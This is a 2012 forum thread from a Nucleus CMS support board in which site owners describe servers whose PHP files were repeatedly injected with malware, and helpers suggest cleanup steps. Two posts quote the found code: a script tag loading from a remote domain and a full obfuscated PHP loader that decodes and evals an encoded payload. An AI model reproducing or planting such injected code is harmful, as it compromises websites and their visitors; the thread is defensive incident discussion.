Security Hole!

Found something that doesn't work as expected? Encountered PHP errors? Submit your bug reports here!
elliottoman
Posts: 18
Joined: Thu May 12, 2011 4:19 pm
Location: Kingston, NY

Security Hole!

Postby elliottoman » Mon Oct 01, 2012 12:40 pm

It's come to my attention that every Nucleus-based site on my server is being used to host a malicious script. The script is being generated by every page on every Nucleus-based site, automatically inserted (regardless of skin structure) just before the </body> tag. It looks something like this:

Code: Select all

<script src="http://syn20tax.rr.nu/nl.php?p=d"></script>


...but the URLs appear to be generated randomly.

Is there anything I can do short of taking the sites down entirely? And is there any hope that a security patch will be released to correct this vulnerability?
elliottoman
Posts: 18
Joined: Thu May 12, 2011 4:19 pm
Location: Kingston, NY

Postby elliottoman » Mon Oct 01, 2012 3:26 pm

Further inspection revealed that the Nucleus admin itself was not compromised; the code had been injected into nearly every PHP file on my server—it just happens that most of them were used for Nucleus.
ftruscot
Nucleus Guru
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts
Contact:

Postby ftruscot » Mon Oct 01, 2012 4:08 pm

Often this is a server or ftp vulnerability that causes this. Cleaning it out is not fun. One of the first things you should do is change all your passwords and make sure the systems you use to connect to your hosting control panel are all free of viruses.

On the nucleus side, you should be sure to be at the latest version, which is presently 3.64.
Is your question not solved yet?
Search our FAQ,
read the Documentation, or
browse the list of available plugins.

Check out my plugins
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Tue Oct 09, 2012 12:50 pm

I got hit with it again as well

this code is on every php page:

Code: Select all

<?php
$md5 = "1b2763805e2a68237c83383f154f261c";
$ae = array("(","s","e",'t',"_",'v',';','4',"z","f",'o','l','c',")","g","b",'6','i',"n",'a','d','$','r');
$bee = create_function('$'.'v',$ae[2].$ae[5].$ae[19].$ae[11].$ae[0].$ae[14].$ae[8].$ae[17].$ae[18].$ae[9].$ae[11].$ae[19].$ae[3].$ae[2].$ae[0].$ae[15].$ae[19].$ae[1].$ae[2].$ae[16].$ae[7].$ae[4].$ae[20].$ae[2].$ae[12].$ae[10].$ae[20].$ae[2].$ae[0].$ae[21].$ae[5].$ae[13].$ae[13].$ae[13].$ae[6]);
$bee('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');
?>


I've changed every password on the system and I can't figure out how they are getting in.
I'm off to reset again
ftruscot
Nucleus Guru
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts
Contact:

Postby ftruscot » Tue Oct 09, 2012 12:57 pm

Is nucleus up to date? Other php programs up to date? Are there any strange php files in the media folder?
Is your question not solved yet?

Search our FAQ,

read the Documentation, or

browse the list of available plugins.



Check out my plugins
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Wed Oct 10, 2012 4:35 am

nucleus is up to date and no odd php files

one one site there is a coppermine gallery in need of a patch, but that is currently disabled because I'm betting that is the issue
ftruscot
Nucleus Guru
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts
Contact:

Postby ftruscot » Wed Oct 10, 2012 10:59 pm

sometimes leaving the files on the server can still leave you vulnerable even if the app is "turned off". Maybe rename the folder containing it so that it's hard to find (not in a known location).
Is your question not solved yet?

Search our FAQ,

read the Documentation, or

browse the list of available plugins.



Check out my plugins
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Thu Oct 11, 2012 3:28 am

yea that's exactly what I did... buried it in a different folder outside the web directory

it sucks trying to recover from this kinda hack
ftruscot
Nucleus Guru
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts
Contact:

Postby ftruscot » Thu Oct 11, 2012 3:31 am

Yes. It does. Can you use file modification times to determine which file may be the first one hacked?
Is your question not solved yet?

Search our FAQ,

read the Documentation, or

browse the list of available plugins.



Check out my plugins
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Fri Oct 12, 2012 3:15 am

they got me again... and that was after removing the coppermine gallery.

looks like all the php files inside 1 site were modified within 1 min
ftruscot
Nucleus Guru
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts
Contact:

Postby ftruscot » Fri Oct 12, 2012 3:26 am

Wow. Have you changed your FTP password? Any .htaccess files get modified? Are all your php files nucleus files?

I'd be happy to look at the site tomorrow if you trust me. You can email me at my gmail.com address. The username part is ftruscot.
Is your question not solved yet?

Search our FAQ,

read the Documentation, or

browse the list of available plugins.



Check out my plugins
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Fri Oct 12, 2012 3:33 am

you make still have a login on my system let me check

yep ftp passwords were changed, no .htaccess files and yes I think all the php (at this point) are nucleus
User avatar
WillyP
Nucleus Guru
Nucleus Guru
Posts: 872
Joined: Sun Aug 30, 2009 3:29 am
Location: Pembroke, NH
Contact:

Postby WillyP » Sun Oct 14, 2012 3:09 pm

Make sure you check all the files, code can be run from inside any file, even images.
ftruscot
Nucleus Guru
Nucleus Guru
Posts: 7430
Joined: Wed Feb 22, 2006 6:19 pm
Location: Massachusetts
Contact:

Postby ftruscot » Mon Oct 15, 2012 3:40 pm

That's a good point, WillyP.
Is your question not solved yet?

Search our FAQ,

read the Documentation, or

browse the list of available plugins.



Check out my plugins
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Thu Oct 18, 2012 1:49 am

sorry... off the charts slammed at work

I've grabbed all the files off the server and am running a scan on them now
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Sun Oct 21, 2012 1:43 am

and I got hit again... sheesh
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Tue Oct 23, 2012 2:05 am

think I found it... my honeypot was compromised
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Wed Oct 24, 2012 3:01 pm

nope that wasn't it

my barracuda firewall is detecting a this:
Spyware.Exploit.Misc.MU.url-of-site

seems to be always at 1:11am Central
well I'm off to change passwords

at least this time is seems to be isolated to just 2 sites
User avatar
Imajica
Posts: 129
Joined: Sat Feb 06, 2010 11:52 pm
Location: Racine WI USA
Contact:

Postby Imajica » Fri Oct 26, 2012 4:37 am

got it (I think)

there was a bunch of extra files in /nucleus/plugins/colorbox/style1/images/internet_explorer and /nucleus/documentation/devdocs/styles I must have missed during the last cleanup

Return to “Bug Reports & Feature Requests”